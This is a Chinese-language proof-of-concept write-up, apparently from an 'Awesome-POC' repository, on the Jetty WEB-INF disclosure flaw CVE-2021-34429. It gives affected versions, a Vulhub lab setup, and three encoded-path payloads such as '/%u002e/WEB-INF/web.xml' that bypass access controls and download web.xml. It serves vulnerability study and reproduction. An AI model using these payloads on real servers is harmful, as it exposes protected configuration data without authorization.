Awesome-POC/中间件漏洞/Jetty WEB-INF 敏感信息泄露漏洞 CVE-2021-34429.md
2024-11-06 14:10:36 +08:00

50 lines
1.3 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Jetty WEB-INF 敏感信息泄露漏洞 CVE-2021-34429
## 漏洞描述
Eclipse Jetty 是一个 Java Web 服务器和 Java Servlet 容器。
Jetty 9.4.40 修复了一个模糊路径信息泄露漏洞[CVE-2021-28164](https://github.com/vulhub/vulhub/tree/master/jetty/CVE-2021-28164)CVE-2021-34429 是它的变种和绕过。
有 3 种类型的有效载荷可以泄露以下内容`WEB-INF/web.xml`
- 基于 Unicode 的 URL 编码:`/%u002e/WEB-INF/web.xml`
- `\0``.`错误:`/.%00/WEB-INF/web.xml`
- `\0``..`错误:`/a/b/..%00/WEB-INF/web.xml`
参考:
- https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
- https://xz.aliyun.com/t/10039
## 漏洞影响
```
9.4.37 ≤ Eclipse Jetty ≤ 9.4.42
10.0.1 ≤ Eclipse Jetty ≤ 10.0.5
11.0.1 ≤ Eclipse Jetty ≤ 11.0.5
```
## 环境搭建
Vulhub执行以下命令启动 Jetty 9.4.40 服务器。
```
docker-compose up -d
```
服务器启动后,访问`http://your-ip:8080`查看示例页面。
## 漏洞复现
`/%u002e`unicode解码为
![image-20220224170220366](images/202202241702407.png)
直接访问`/WEB-INF/web.xml`将会返回404页面
![image-20220224165918722](images/202202241659889.png)
使用`/%u002e`来绕过限制下载web.xml
![image-20220224165957192](images/202202241659338.png)